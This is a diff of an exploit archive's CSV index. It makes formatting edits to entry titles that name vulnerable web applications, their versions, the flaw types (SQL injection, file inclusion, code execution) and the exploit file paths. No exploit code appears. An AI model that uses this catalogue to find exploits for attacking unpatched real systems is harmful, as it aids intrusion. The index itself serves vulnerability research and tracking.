Execution",2011-11-24,"Adel SBM",php,webapps,0 18153,platforms/cgi/webapps/18153.txt,"LibLime Koha 4.2 - Local File Inclusion",2011-11-24,"Akin Tosunlar",cgi,webapps,0 @@ -25889,7 +25890,7 @@ id,file,description,date,author,platform,type,port 18213,platforms/php/webapps/18213.php,"Traq 2.3 - Authentication Bypass / Remote Code Execution",2011-12-07,EgiX,php,webapps,0 18214,platforms/php/webapps/18214.py,"SMF 2.0.1 - SQL Injection / Privilege Escalation",2011-12-07,The:Paradox,php,webapps,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection (1)",2011-12-09,Don,php,webapps,0 -18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - (Messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 +18224,platforms/php/webapps/18224.php,"Docebo Lms 4.0.4 - 'Messages' Remote Code Execution",2011-12-09,mr_me,php,webapps,0 18230,platforms/php/webapps/18230.txt,"Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 18231,platforms/php/webapps/18231.txt,"WordPress Plugin UPM-POLLS 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 18232,platforms/php/webapps/18232.txt,"FCMS CMS 2.7.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 @@ -25996,7 +25997,7 @@ id,file,description,date,author,platform,type,port 18455,platforms/php/webapps/18455.txt,"osCommerce 3.0.2 - Persistent Cross-Site Scripting",2012-02-02,Vulnerability-Lab,php,webapps,0 18456,platforms/php/webapps/18456.txt,"Achievo 1.4.3 - Multiple Web Vulnerabilities",2012-02-02,Vulnerability-Lab,php,webapps,0 18464,platforms/php/webapps/18464.html,"GAzie 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 -18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - 'base_qry_main.php t_view' SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 +18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - 'base_qry_main.php?t_view' SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 18466,platforms/php/webapps/18466.txt,"Tube Ace (Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",php,webapps,0 @@ -26026,7 +26027,7 @@ id,file,description,date,author,platform,type,port 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (English/Italian) - Arbitrary File Upload / Remote Code Execution (Metasploit)",2012-02-23,"Danny Moules",php,webapps,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution",2012-02-25,ls,php,webapps,0 -18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file Parameter) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 +18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - 'file' Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery - SQL Injection",2012-02-25,CorryL,php,webapps,0 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) 2.11 - Cross-Site Request Forgery (Delete Admin / Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS 1.1.4 - Cross-Site Request Forgery (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 @@ -26035,7 +26036,7 @@ id,file,description,date,author,platform,type,port 18544,platforms/php/webapps/18544.txt,"ImgPals Photo Host 1.0 - Admin Account Disactivation",2012-02-29,CorryL,php,webapps,0 18545,platforms/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 -18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 Beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 +18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 Beta 5 - 'search.php' search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 18564,platforms/php/webapps/18564.txt,"Drupal 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18553,platforms/multiple/webapps/18553.txt,"Rivettracker 1.03 - Multiple SQL Injections",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQL Injections",2012-03-03,G13,php,webapps,0 @@ -26050,7 +26051,7 @@ id,file,description,date,author,platform,type,port 18574,platforms/php/webapps/18574.txt,"RazorCMS 1.2.1 STABLE - Arbitrary File Upload",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 18582,platforms/cgi/webapps/18582.txt,"Zend Server 5.6.0 - Multiple Remote Script Insertion Vulnerabilities",2012-03-12,LiquidWorm,cgi,webapps,0 18583,platforms/php/webapps/18583.txt,"Saman Portal - Local File Inclusion",2012-03-12,TMT,php,webapps,0 -18616,platforms/php/webapps/18616.txt,"Pre Printing Press - product_desc.php 'pid' SQL Injection",2012-03-18,"Easy Laster",php,webapps,0 +18616,platforms/php/webapps/18616.txt,"Pre Printing Press - 'product_desc.php?pid' SQL Injection",2012-03-18,"Easy Laster",php,webapps,0 18618,platforms/php/webapps/18618.pl,"Joomla! 2.5.0 < 2.5.1 - Time Based SQL Injection",2012-03-19,"A. Ramos",php,webapps,0 18589,platforms/php/webapps/18589.txt,"Acal Calendar 2.2.6 - Cross-Site Request Forgery",2012-03-12,"Number 7",php,webapps,0 18595,platforms/php/webapps/18595.txt,"Max Guestbook 1.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 @@ -26165,7 +26166,7 @@ id,file,description,date,author,platform,type,port 18875,platforms/php/webapps/18875.txt,"Galette - 'picture.php' SQL Injection",2012-05-13,sbz,php,webapps,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 -18884,platforms/php/webapps/18884.txt,"S9Y Serendipity 1.6 - (Backend) Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0 +18884,platforms/php/webapps/18884.txt,"S9Y Serendipity 1.6 - 'Backend' Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps,0 @@ -26179,7 +26180,7 @@ id,file,description,date,author,platform,type,port 18921,platforms/php/webapps/18921.txt,"Jaow 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 18927,platforms/php/webapps/18927.txt,"SocialEngine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18950,platforms/php/webapps/18950.txt,"NewsAdd 1.0 - Multiple SQL Injections",2012-05-30,WhiteCollarGroup,php,webapps,0 -18934,platforms/php/webapps/18934.rb,"WeBid - converter.php Remote PHP Code Injection (Metasploit)",2012-05-27,Metasploit,php,webapps,0 +18934,platforms/php/webapps/18934.rb,"WeBid - 'converter.php' Remote PHP Code Injection (Metasploit)",2012-05-27,Metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePms 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 - Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injections",2012-05-28,loneferret,php,webapps,0 @@ -26188,8 +26189,8 @@ id,file,description,date,author,platform,type,port 18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1 < 1.3 - Multiple SQL Injections",2012-05-30,loneferret,php,webapps,0 18957,platforms/php/webapps/18957.rb,"PHP Volunteer Management System 1.0.2 - Arbitrary File Upload (Metasploit)",2012-05-31,Metasploit,php,webapps,0 -18960,platforms/php/webapps/18960.txt,"NewsAdd 1.0 - 'lerNoticia.php id' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 -18961,platforms/php/webapps/18961.txt,"Supernews 2.6.1 - 'noticias.php cat' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18960,platforms/php/webapps/18960.txt,"NewsAdd 1.0 - 'lerNoticia.php?id' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 +18961,platforms/php/webapps/18961.txt,"Supernews 2.6.1 - 'noticias.php?cat' SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0 @@ -26234,9 +26235,9 @@ id,file,description,date,author,platform,type,port 19058,platforms/php/webapps/19058.txt,"WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 -19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - ipchange.php Command Injection (Metasploit)",2012-06-12,Metasploit,php,webapps,0 +19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 - 'ipchange.php' Command Injection (Metasploit)",2012-06-12,Metasploit,php,webapps,0 19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 -19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - Uploadify.php Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps,0 +19100,platforms/php/webapps/19100.rb,"WordPress Plugin Foxypress - 'Uploadify.php' Arbitrary Code Execution (Metasploit)",2012-06-13,Metasploit,php,webapps,0 19386,platforms/php/webapps/19386.txt,"UCCASS 1.8.1 - Blind SQL Injection",2012-06-24,dun,php,webapps,0 19132,platforms/php/webapps/19132.txt,"Myre Real Estate Mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 @@ -26262,7 +26263,7 @@ id,file,description,date,author,platform,type,port 19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 19339,platforms/windows/webapps/19339.txt,"SoftPerfect Bandwidth Manager 2.9.10 - Authentication Bypass",2012-06-22,Gitsnik,windows,webapps,0 -19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 - employer-profile.asp SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 +19394,platforms/asp/webapps/19394.txt,"Parodia 6.8 - 'employer-profile.asp' SQL Injection",2012-06-25,"Carlos Mario Penagos Hollmann",asp,webapps,0 19398,platforms/php/webapps/19398.txt,"WordPress Plugin Fancy Gallery 1.2.4 - Arbitrary File Upload",2012-06-25,"Sammy FORGIT",php,webapps,0 19408,platforms/php/webapps/19408.txt,"Zend Framework < 2.0.0 beta4 < 1.12 RC1 < 1.11.11 - Local File Disclosure",2012-06-27,"SEC Consult",php,webapps,0 19403,platforms/php/webapps/19403.rb,"SugarCRM CE 6.3.1 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-06-26,Metasploit,php,webapps,0 @@ -26289,7 +26290,7 @@ id,file,description,date,author,platform,type,port 19628,platforms/php/webapps/19628.txt,"Event Script PHP 1.1 CMS - Multiple Vulnerabilities",2012-07-06,Vulnerability-Lab,php,webapps,0 19629,platforms/php/webapps/19629.txt,"Webmatic 3.1.1 - Blind SQL Injection",2012-07-06,"High-Tech Bridge SA",php,webapps,0 19630,platforms/php/webapps/19630.rb,"Tiki Wiki CMS Groupware 8.3 - 'Unserialize()' PHP Code Execution (Metasploit)",2012-07-09,Metasploit,php,webapps,0 -19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 - diff.php Arbitrary Command Execution (Metasploit)",2012-07-09,Metasploit,php,webapps,0 +19631,platforms/php/webapps/19631.rb,"Basilic 1.5.14 - 'diff.php' Arbitrary Command Execution (Metasploit)",2012-07-09,Metasploit,php,webapps,0 19671,platforms/windows/webapps/19671.rb,"Umbraco CMS - Remote Command Execution (Metasploit)",2012-07-09,Metasploit,windows,webapps,0 19715,platforms/php/webapps/19715.txt,"WordPress Plugin WP-Predict 1.0 - Blind SQL Injection",2012-07-10,"Chris Kellum",php,webapps,0 19758,platforms/php/webapps/19758.rb,"Hastymail 2.1.1 RC1 - Command Injection (Metasploit)",2012-07-12,Metasploit,php,webapps,0 @@ -26315,7 +26316,7 @@ id,file,description,date,author,platform,type,port 19985,platforms/php/webapps/19985.txt,"iBoutique 4.0 - 'key' SQL Injection",2012-07-20,"SecPod Research",php,webapps,0 20011,platforms/windows/webapps/20011.js,"SolarWinds Orion Network Performance Monitor 10.2.2 - Multiple Vulnerabilities",2012-07-21,muts,windows,webapps,0 20029,platforms/php/webapps/20029.rb,"EGallery - Arbitrary '.PHP' File Upload (Metasploit)",2012-07-23,Metasploit,php,webapps,0 -20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php' q Parameter SQL Injection",2012-07-22,muts,php,webapps,0 +20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - 'statusFilter.php?q' SQL Injection",2012-07-22,muts,php,webapps,0 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Persistent Cross-Site Scripting / Blind SQL Injection / Remote Code Execution",2012-07-22,muts,asp,webapps,0 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel - SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0 20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - 'blocked.php?id' Blind SQL Injection",2012-07-23,muts,linux,webapps,0 @@ -26402,9 +26403,9 @@ id,file,description,date,author,platform,type,port 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting",2012-08-17,"Shai rod",php,webapps,0 20579,platforms/php/webapps/20579.py,"T-dah Webmail Client - Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-08-17,"Shai rod",php,webapps,0 20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 -20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - admin.php3 Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0 -20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - violation.php3 Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0 -20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor",2000-01-06,"Max Vision",php,webapps,0 +20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - 'admin.php3' Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0 +20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - 'violation.php3' Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0 +20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - 'auth.php3' Backdoor",2000-01-06,"Max Vision",php,webapps,0 20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQL Injection",2012-08-17,loneferret,php,webapps,0 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail - Persistent Cross-Site Scripting",2012-08-18,"Shai rod",php,webapps,0 20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Persistent Cross-Site Scripting",2012-08-18,loneferret,windows,webapps,7080 @@ -26429,7 +26430,7 @@ id,file,description,date,author,platform,type,port 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro 4 - Local File Inclusion",2012-08-23,CorryL,php,webapps,0 20762,platforms/php/webapps/20762.php,"webpa 1.1.0.1 - Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20759,platforms/php/webapps/20759.txt,"letodms 3.3.6 - Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 -20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 +20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - VM Applicance Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 40423,platforms/php/webapps/40423.txt,"Joomla! Component Event Booking 2.10.1 - SQL Injection",2016-09-26,"Persian Hack Team",php,webapps,80 20785,platforms/php/webapps/20785.txt,"Ad Manager Pro - Multiple Vulnerabilities",2012-08-24,"Yakir Wizman",php,webapps,0 20787,platforms/php/webapps/20787.txt,"Text Exchange Pro - 'index.php' Local File Inclusion",2012-08-24,"Yakir Wizman",php,webapps,0 @@ -26442,7 +26443,7 @@ id,file,description,date,author,platform,type,port 20857,platforms/php/webapps/20857.txt,"web@all CMS 2.0 - Multiple Vulnerabilities",2012-08-27,LiquidWorm,php,webapps,0 20859,platforms/php/webapps/20859.txt,"Vlinks 2.0.3 - 'id' SQL Injection",2012-08-27,JIKO,php,webapps,0 20862,platforms/php/webapps/20862.txt,"WordPress Plugin Count Per Day 3.2.3 - Cross-Site Scripting",2012-08-27,Crim3R,php,webapps,0 -20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 +20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - 'products_name_de' Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 - Community Manager Insecure Arbitrary File Upload",2012-08-27,"Sense of Security",asp,webapps,0 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 20871,platforms/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 @@ -26534,7 +26535,7 @@ id,file,description,date,author,platform,type,port 21358,platforms/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21374,platforms/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x - Page Request SQL Injection",2002-04-11,"Simon Lodal",cgi,webapps,0 21377,platforms/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x - User-Embedded Scripting",2002-04-13,ppp-design,php,webapps,0 -21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - URL Parameter Manipulation",2002-04-15,SeazoN,php,webapps,0 +21380,platforms/php/webapps/21380.php,"Burning Board 1.1.1 - 'URL' Manipulation",2002-04-15,SeazoN,php,webapps,0 21381,platforms/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,php,webapps,0 21382,platforms/php/webapps/21382.txt,"XGB 1.2 - Remote Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 21383,platforms/php/webapps/21383.txt,"xNewsletter 1.0 - Form Field Input Validation",2002-04-14,Firehack,php,webapps,0 @@ -26546,7 +26547,7 @@ id,file,description,date,author,platform,type,port 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps,0 21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 - Script Injection",2002-04-19,"Daniel Nyström",php,webapps,0 -21400,platforms/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - members.asp SQL Injection",2002-04-19,acemi,asp,webapps,0 +21400,platforms/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - 'members.asp' SQL Injection",2002-04-19,acemi,asp,webapps,0 21401,platforms/php/webapps/21401.txt,"PostBoard 2.0 - BBCode IMG Tag Script Injection",2002-04-19,gcsb,php,webapps,0 21403,platforms/php/webapps/21403.txt,"PostBoard 2.0 - Topic Title Script Execution",2002-04-19,gcsb,php,webapps,0 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps,0 @@ -26681,7 +26682,7 @@ id,file,description,date,author,platform,type,port 21866,platforms/multiple/webapps/21866.txt,"ServersCheck Monitoring Software 9.0.12/9.0.14 - Persistent Cross-Site Scripting",2012-10-10,loneferret,multiple,webapps,0 21891,platforms/php/webapps/21891.txt,"vOlk Botnet Framework 4.0 - Multiple Vulnerabilities",2012-10-11,Vulnerability-Lab,php,webapps,0 21873,platforms/php/webapps/21873.txt,"PostNuke 0.72 - 'modules.php' Cross-Site Scripting",2002-09-26,"Mark Grimes",php,webapps,0 -21874,platforms/php/webapps/21874.txt,"vBulletin 2.0.3 - calendar.php Command Execution",2002-09-27,gosper,php,webapps,0 +21874,platforms/php/webapps/21874.txt,"vBulletin 2.0.3 - 'calendar.php' Command Execution",2002-09-27,gosper,php,webapps,0 21875,platforms/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine - Cross-Site Scripting",2002-09-28,Skinnay,jsp,webapps,0 21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 - Web Root Full Path Disclosure",2002-09-29,FVS,cgi,webapps,0 21878,platforms/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form - Script Injection",2002-09-29,FVS,cgi,webapps,0 @@ -26719,8 +26720,8 @@ id,file,description,date,author,platform,type,port 21966,platforms/cgi/webapps/21966.txt,"MailReader.com 2.3.x - NPH-MR.cgi File Disclosure",2002-10-28,pokleyzz,cgi,webapps,0 21967,platforms/php/webapps/21967.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'entete.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 21968,platforms/php/webapps/21968.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'enteteacceuil.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 -21969,platforms/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php' subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 -21970,platforms/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php' subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 +21969,platforms/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'index.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 +21970,platforms/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - 'newtopic.php?subpath' Remote File Inclusion",2002-10-28,frog,php,webapps,0 21976,platforms/php/webapps/21976.txt,"Jason Orcutt Prometheus 3.0/4.0/6.0 - Remote File Inclusion",2002-11-01,"Karol Wiesek",php,webapps,0 21977,platforms/php/webapps/21977.txt,"PHP-Nuke 5.6 - 'modules.php' SQL Injection",2002-11-01,kill9,php,webapps,0 21979,platforms/cgi/webapps/21979.txt,"ION Script 1.4 - Remote File Disclosure",2002-11-01,"Zero X",cgi,webapps,0 @@ -26746,18 +26747,18 @@ id,file,description,date,author,platform,type,port 22045,platforms/cgi/webapps/22045.txt,"Working Resources BadBlue 1.7.1 - Search Page Cross-Site Scripting",2002-11-25,"Matthew Murphy",cgi,webapps,0 22047,platforms/php/webapps/22047.txt,"FreeNews 2.1 - Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps,0 22048,platforms/php/webapps/22048.txt,"News Evolution 1.0/2.0 - Include Undefined Variable Command Execution",2002-11-26,frog,php,webapps,0 -22050,platforms/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - imageFolio.cgi direct Parameter Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 +22050,platforms/cgi/webapps/22050.txt,"BizDesign ImageFolio 2.x/3.0.1 - 'imageFolio.cgi?direct' Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 22051,platforms/cgi/webapps/22051.txt,"BizDesign ImageFolio 2.x/3.0.1 - nph-build.cgi Cross-Site Scripting",2002-11-27,SecurityTracker.com,cgi,webapps,0 22052,platforms/cgi/webapps/22052.txt,"YaBB 1 Gold - SP 1 YaBB.pl Cross-Site Scripting",2002-11-28,"Fabricio Angeletti",cgi,webapps,0 22065,platforms/php/webapps/22065.html,"phpBB 2.0.3 - 'search.php' Cross-Site Scripting",2002-12-03,f_a_a,php,webapps,0 22070,platforms/windows/webapps/22070.py,"OTRS 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0 22071,platforms/php/webapps/22071.txt,"WordPress Plugin FireStorm Professional Real Estate 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 -22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - viewtopic.php Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 +22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final Beta - 'viewtopic.php' Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final Beta - 'viewtopic.php' Cross-Site Scripting",2002-11-08,euronymous,php,webapps,0 22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 - HTML Injection",2002-11-09,"Dorin Balanica",php,webapps,0 22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0 22083,platforms/php/webapps/22083.txt,"Deerfield VisNetic WebSite 3.5.13.1 - Cross-Site Scripting",2002-12-12,"Ory Segal",php,webapps,0 -22086,platforms/php/webapps/22086.txt,"Mambo Site Server 4.0.11 - PHPInfo.php Information Disclosure",2002-12-12,euronymous,php,webapps,0 +22086,platforms/php/webapps/22086.txt,"Mambo Site Server 4.0.11 - 'PHPInfo.php' Information Disclosure",2002-12-12,euronymous,php,webapps,0 22087,platforms/php/webapps/22087.txt,"Mambo Site Server 4.0.11 - Full Path Disclosure",2002-12-12,euronymous,php,webapps,0 22088,platforms/php/webapps/22088.txt,"MyPHPSoft MyPHPLinks 2.1.9/2.2 - SQL Injection Administration Bypassing",2002-12-14,frog,php,webapps,0 22089,platforms/php/webapps/22089.txt,"PHP-Nuke 6.0 - Web Mail Remote PHP Script Execution",2002-12-16,"Ulf Harnhammar",php,webapps,0 @@ -26784,8 +26785,8 @@ id,file,description,date,author,platform,type,port 22137,platforms/cgi/webapps/22137.txt,"FormMail-Clone - Cross-Site Scripting",2003-01-09,"Rynho Zeros Web",cgi,webapps,0 22146,platforms/php/webapps/22146.txt,"YABB 1.4.1 SE - 'Reminder.php' SQL Injection",2003-01-12,"VOID.AT Security",php,webapps,0 22148,platforms/php/webapps/22148.txt,"PHPPass 2 - 'AccessControl.php' SQL Injection",2003-01-13,frog,php,webapps,0 -22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - 'index.php' bn Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 -22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - 'modules.php' File Parameter Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 +22149,platforms/php/webapps/22149.txt,"W-Agora 4.1.6 - 'index.php?bn' Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 +22150,platforms/php/webapps/22150.txt,"W-Agora 4.1.6 - 'modules.php?File' Traversal Arbitrary File Access",2003-01-13,sonyy,php,webapps,0 22151,platforms/php/webapps/22151.txt,"Movable Type Pro 5.13en - Persistent Cross-Site Scripting",2012-10-22,sqlhacker,php,webapps,0 